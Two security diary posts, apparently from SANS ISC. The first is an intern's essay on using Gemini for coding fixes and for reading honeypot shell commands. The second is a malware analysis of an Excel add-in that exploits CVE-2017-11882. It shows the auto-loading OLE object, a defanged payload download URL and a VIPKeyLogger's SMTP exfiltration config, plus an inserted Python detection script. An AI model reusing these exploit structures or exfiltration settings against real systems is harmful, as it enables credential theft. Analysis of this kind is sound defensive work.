AI and Faster Attack Analysis [Guest Diary]

Published: 2025-08-13. Last Updated: 2025-08-14 00:06:17 UTC
by Guy Bruneau (Version: 1)

[This is a Guest Diary by Joseph Noa, an ISC intern as part of the SANS.edu BACS program]

Introduction

Time is of the essence when it comes to attacks, and understanding what you're seeing can be tricky under pressure. As security professionals, we need to use every tool available to us so we can identify, stop, and then mitigate threats. Artificial Intelligence (AI) is the future. It is a tool that can make security professionals more efficient, and I cannot stress that point enough: it is a TOOL. ChatGPT, Gemini, Copilot, and others are readily available to us, whether we subscribe or use a free tier. I use AI at my job to help me with my analysis and various tasks, so I'm going to talk about it.

Why AI

I want to state again that AI is a tool. Security professionals use tools every day, and AI is one that should be leveraged to fill in knowledge gaps or assist in analysis. Google is a phenomenal tool when it comes to researching things. Whether you need help programming/scripting or need to learn about a tool and how to use it, Google has been the go-to for years.

However, using Google can be time consuming. Let's say you are programming/scripting something to perform a specific task, or something that can ingest data and produce a specific result catered to your needs. You want this to be repeatable. You are struggling to get the results you want. There is a line of code that executes, but the data comes out in the wrong format, or only part of the expected data is produced. Maybe a loop fails to execute. Maybe it just fails. There are endless reasons why it could be failing. This has happened to me countless times while working with PowerShell and Python. It can be an extremely frustrating process. So now we turn to Google to point us in a direction. We look at several Stack Overflow threads, or another technical forum, that show something similar to what we are trying to accomplish, and that code is added to ours. It runs and still fails. Then we realize the code in the thread is for Python 2 and the code being developed is Python 3. Features may have changed or been removed entirely. So, what now?

AI and Coding

Technology is constantly changing. There are new features and updates on a regular basis, and it is impossible to keep up. I'm not a coder by trade, but I have needed to build things out in Python and PowerShell. Constant trial and error. Sometimes, it is a lot more error than not.

This is where I think AI can prove extremely valuable. We can paste code into the AI chat box and ask about the specific issue that is causing the code to fail to produce the desired results. AI provides instant feedback. Sometimes it may be something as simple as incorrect formatting causing a loop not to execute while also not throwing an error. AI can quickly identify the issue and return code with the correct formatting. We can then take that code, run it, and find it working and producing the desired result. This all happens over the course of a few minutes, whereas continuing to Google the issue just keeps yielding different answers that fail to resolve it. This can happen simply because we failed to notice that a line of code wasn't nested correctly in a loop because the indentation was wrong.

The best part about this is that not only does the AI provide the corrected code back, but it will also provide an explanation of the issue, highlighting the differences between the incorrect code and the corrected code. Explanations can go a long way in terms of learning and growing our skill sets.

The usual "Hello World!" test is enough to give a simple example of how AI can help with coding.

I'm going to run hello_world.py. The code is shown below.

#bad code
print(hello world!)

The screenshot below shows the error that's thrown when attempting to run the bad code.

Let's throw that code into Gemini (Google's AI and my preferred AI) and see what Gemini tells us.

Gemini ingested the code, reviewed it, and, in this case, gave us feedback within seconds. We will see that Gemini not only provided two different solutions to our problem but also explained why it wasn't working.

Let's try out the solutions. Below are the two versions of the code. I'll use them to create two scripts and then run them in my terminal to see if they work. As you can see, Gemini provided us with two solutions to our code and they both worked.

print("hello world!")

print('hello world!')

One thing to note: using AI does not replace our need to understand coding and what we are doing. AI can and will be wrong at times. We need to be able to pivot if the AI doesn't generate usable code. In that case, instead of looking to AI to provide the solution, we can use the information it gave us to pivot in our search for a solution. Either way, we get to where we need to be more quickly with the help of AI.

AI and Analysis

As with coding, AI can be a huge benefit when it comes to the analysis of attacks. Attacks come in different forms which require different analysis. If a machine is infected with a malicious PowerShell script that uses base64 encoding to obfuscate what it does, you can take that script, put it into an AI prompt, and it will tell you whether the script is malicious, that it uses base64 encoding, and what it's doing. AI will do this, and do it rather quickly.

Another example is when a threat actor has established a shell on a system. The logs are being sent to a SIEM where you can see what commands were being executed on the machine. AI can help put together a picture of what the threat actor is attempting to accomplish based on the commands. Let's run through an example of this.

I had never worked with a honeypot before, so the BACS internship was the first time I was exposed to some of these things. For my first observation, I saw some commands being run on the sensor that I wasn't familiar with. I generally understood what was happening, but I hadn't seen `nohup $SHELL` before.
The screenshot below is from my observation assignment.

If we Google `nohup $SHELL`, we can see that sometimes, even if we don't want to, we are going to get an answer from AI. Gemini is built into Google, and if it can provide an answer, it will.

When we Google `nohup $SHELL`, we get an answer like we would by going to https://gemini.google.com/ and asking our question in the prompt. Gemini provides a breakdown and shows that the nohup command stands for "no hang up" and that $SHELL is the environment variable holding the user's default shell.

We can take our analysis a little further. I'm going to use the Gemini prompt and submit the entire command to get a breakdown of what is happening. Both the executed command and Gemini's response are extremely long, so I'm going to omit the response in its entirety.

Again, we see a breakdown of the commands being run and what they are doing. This can be incredibly useful when it comes to quickly analyzing and understanding what is happening. Seconds matter and having this capability helps us get where we need to be more quickly.

Do We Need AI?

Do we need AI to do our jobs as security professionals? The answer is no. The fact is, we can absolutely accomplish what we need to without the help of AI. Is AI going to be wrong sometimes? Yes. Are we wrong sometimes? Absolutely. But not using AI as a tool that can enable us to be more efficient and react more quickly puts us at a disadvantage. We see companies like CrowdStrike with their AI analyst (Charlotte AI) that gathers information and correlates events to provide an analyst with what they need to react. Threat actors aren't limiting themselves and will use anything they can to gain an advantage. Security professionals should be using every advantage we can to keep up. AI is the way of the future, and while it's not perfect, it helps us get to where we need to be more quickly.

[1] CrowdStrike Charlotte AI: https://www.crowdstrike.com/en-us/platform/charlotte-ai/
[2] SANS.edu BACS program: https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu


CVE-2017-11882 Will Never Die

Published: 2025-08-13. Last Updated: 2025-08-13 07:04:52 UTC
by Xavier Mertens (Version: 1)

One of the key messages broadcast by security professionals is: "Patch, patch and patch again!". But there are nasty vulnerabilities that attackers keep exploiting even though they are pretty old. CVE-2017-11882 is one of them: this remote code execution vulnerability affects Microsoft Office and, more precisely, the good old "Equation Editor". Microsoft even removed the tool because of its numerous security issues[1], but attackers still use it to spread modern malware.

I spotted an interesting file called "urchase_order__p.o_t4787074__kronospan_aps.xlam" (no typo, the leading "P" was missing). The file (SHA256:4fe60a82350a24cc0bfeb1a9df86a751cec9b7307035f90b0a08959a16a1fc7c) has a normal VT score (38/68)[2]. These days, it's less common to see malicious Microsoft Office documents due to the latest rules implemented by Microsoft to make macro activation tricky[3].

Indeed, the file does not contain any VBA macro but an interesting payload:

remnux@remnux:~/malwarezoo/20250812$ oledump.py urchase_order__p.o_t4787074__kronospan_aps.xlam
A: xl/embeddings/wB.WOQMg
 A1:   3011188 ‘EqUaTIon nATIvE’
 A2:         0 ‘umLKsQ5’

Let's find where the malicious code is!

remnux@remnux:~/malwarezoo/20250812$ zipdump.py urchase_order__p.o_t4787074__kronospan_aps.xlam
Index Filename                                Encrypted Timestamp
    1 [Content_Types].xml                             0 2025-08-11 01:43:16
    2 _rels/.rels                                     0 2025-08-11 01:43:16
    3 xl/_rels/workbook.xml.rels                      0 2025-08-11 01:43:16
    4 xl/workbook.xml                                 0 2025-08-11 01:43:16
    5 xl/theme/theme1.xml                             0 2025-08-11 01:43:16
    6 xl/worksheets/_rels/sheet1.xml.rels             0 2025-08-11 01:43:16
    7 xl/worksheets/sheet2.xml                        0 2025-08-11 01:43:16
    8 xl/worksheets/sheet3.xml                        0 2025-08-11 01:43:16
    9 xl/worksheets/sheet1.xml                        0 2025-08-11 01:43:16
   10 xl/sharedStrings.xml                            0 2025-08-11 01:43:16
   11 xl/styles.xml                                   0 2025-08-11 01:43:16
   12 xl/printerSettings/printerSettings1.bin         0 2025-08-11 01:43:16
   13 docProps/core.xml                               0 2025-08-11 01:43:16
   14 docProps/app.xml                                0 2025-08-11 01:43:16
   15 xl/drawings/vmlDrawing1.vml                     0 2025-08-11 01:43:16
   16 xl/embeddings/wB.WOQMg                          0 2025-08-11 01:43:16

The file contains three sheets and, in the first one (xl/worksheets/sheet1.xml), we find this:

<oleObject progId="g0naPE1NuRY" shapeId="1348" r:id="rId2" autoLoad="true"/></oleObjects>

In the sheet's relationships file, we see this:

<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/wB.WOQMg"/></Relationships>

It corresponds to stream 16 (xl/embeddings/wB.WOQMg). This one looks like the exploit with an obfuscated payload:

remnux@remnux:~/malwarezoo/20250812$ zipdump.py urchase_order__p.o_t4787074__kronospan_aps.xlam -s 16 -d \
oledump.py -s 1 -d | \
xxd | more

Let's verify that we are indeed facing the Equation Editor exploit. We can easily perform this task with another of Didier Stevens's great tools, format-bytes.py:

remnux@remnux:~/malwarezoo/20250812$ zipdump.py urchase_order__p.o_t4787074__kronospan_aps.xlam -s 16 -d | oledump.py -s 1 -d | format-bytes.py -f name=eqn1
 1:   <class 'int'>         1c size of EQNOLEFILEHDR
 2:   <class 'int'>      15c26 
 3:   <class 'int'>       dc36 
 4:   <class 'int'>    197e73f 
 5:   <class 'int'>   6f506a2f 
 6:   <class 'int'>   3d02ab83 
 7:   <class 'int'>   78d5fa8d 
 8:   <class 'int'>    8248bc3 
 9:   <class 'int'>          3 Start MTEF header
10:   <class 'int'>         7e 
11:   <class 'int'>          1 
12:   <class 'int'>         eb 
13:   <class 'int'>         47 
14:   <class 'int'>          a Full size record
15:   <class 'int'>          1 Line record
16:   <class 'int'>          5 Font record
17:   <class 'int'>         f8 
18:   <class 'int'>         9b 
19: <class 'bytes'>         40 .......... b'e1ec0000000000000000' 0.833805 4caa3635d3c1ebf1bfc9e49745f5649c Shellcode/Command (fontname)
20:   <class 'int'>          0 
21:   <class 'int'>          0 
22:   <class 'int'>          0 
23:   <class 'int'>          0 
Remainder: 3011100
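As an added example (not Xavier's code and not one of Didier's tools), here is a Python triage script that automates the zipdump/oledump steps above: it walks the package, follows each worksheet's oleObject relationship to the embedded file, and checks for the compound-file signature and an "Equation Native" stream name, comparing case-insensitively because of the odd casing seen in the sample. The scoring rule and the constructed sample package are my assumptions; the sample carries only the stream name, not the payload.

```python
import io
import posixpath
import zipfile
import xml.etree.ElementTree as ET

R_NS = "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # compound file (OLE) header signature
# Directory names inside a compound file are UTF-16LE; the sample used odd casing, so compare lowercased bytes.
EQN_STREAM = "equation native".encode("utf-16-le")

def load_rels(zf, part):
    """Map relationship Id -> resolved zip path, read from the part's _rels/<name>.rels file."""
    folder, name = posixpath.split(part)
    rels_name = posixpath.join(folder, "_rels", name + ".rels")
    if rels_name not in zf.namelist():
        return {}
    rels = {}
    for rel in ET.fromstring(zf.read(rels_name)).iter():
        if rel.tag.endswith("}Relationship"):
            rels[rel.get("Id")] = posixpath.normpath(posixpath.join(folder, rel.get("Target", "")))
    return rels

def triage_ooxml(blob):
    """One record per <oleObject> in any worksheet: its target plus the signals seen in the diary."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        names = zf.namelist()
        for part in names:
            if not (part.startswith("xl/worksheets/") and part.endswith(".xml")):
                continue
            rels = load_rels(zf, part)
            for el in ET.fromstring(zf.read(part)).iter():
                if not el.tag.endswith("}oleObject"):
                    continue
                target = rels.get(el.get(R_NS + "id"), "")
                data = zf.read(target) if target in names else b""
                findings.append({"sheet": part, "target": target, "progId": el.get("progId", ""),
                                 "autoLoad": el.get("autoLoad") == "true",
                                 "is_ole": data.startswith(OLE_MAGIC),
                                 "equation_native": EQN_STREAM in data.lower()})
    return findings

def is_equation_editor_suspect(f):
    """Assumed rule: an OLE object with an Equation Native stream that auto-loads or hides behind an odd progId."""
    return f["is_ole"] and f["equation_native"] and (f["autoLoad"] or not f["progId"].startswith("Equation"))

def build_sample(progid="g0naPE1NuRY", autoload="true", stream="EqUaTIon nATIvE"):
    """Constructed package mirroring the structure shown above (stream name only, no exploit bytes)."""
    sheet = ('<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
             f'xmlns:r="{R_NS[1:-1]}"><oleObjects><oleObject progId="{progid}" shapeId="1348" '
             f'r:id="rId2" autoLoad="{autoload}"/></oleObjects></worksheet>')
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            f'<Relationship Id="rId2" Type="{R_NS[1:-1]}/oleObject" Target="../embeddings/wB.WOQMg"/></Relationships>')
    ole = OLE_MAGIC + b"\x00" * 504 + stream.encode("utf-16-le") + b"\x00" * 64
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/worksheets/sheet1.xml", sheet)
        zf.writestr("xl/worksheets/_rels/sheet1.xml.rels", rels)
        zf.writestr("xl/embeddings/wB.WOQMg", ole)
    return buf.getvalue()
```

On a real file, `triage_ooxml(open(path, "rb").read())` gives the list of findings; the stream-name check only looks for the directory entry, so a hit still needs the format-bytes.py style inspection above to confirm the MTEF content.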

Let's open this file in Excel. That's why I keep a very old (and vulnerable) Microsoft Office Suite in my CAPE sandbox:

And indeed:

The sample downloaded from hxxp://213[.]209[.]150[.]18/SoNZ984ijTf8DPr.exe is a VIPKeyLogger with the following config:

{
    "rule": "VIPKeylogger",
    "tags": [
        "keylogger",
        "stealer"
    ],
    "family": "vipkeylogger",
    "credentials": [
        {
            "host": "hosting2[.]ro[.]hostsailor[.]com",
            "port": 587,
            "email_to": "log@wxtp.store",
            "password": "<redacted>",
            "protocol": "smtp",
            "username": "logs@wxtp.store"
        }
    ]
}

The PE file (SHA256:19dac0de92478f91420db6588d40ec9a5115b4a8777cf7ba9dd4ae35059a706d) has a VT score of 49/72[4].

[1] https://support.microsoft.com/en-us/office/equation-editor-6eac7d71-3c74-437b-80d3-c7dea24fdf3f
[2] https://www.virustotal.com/gui/file/4fe60a82350a24cc0bfeb1a9df86a751cec9b7307035f90b0a08959a16a1fc7c
[3] https://learn.microsoft.com/en-us/microsoft-365-apps/security/internet-macros-blocked
[4] https://www.virustotal.com/gui/file/19dac0de92478f91420db6588d40ec9a5115b4a8777cf7ba9dd4ae35059a706d

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
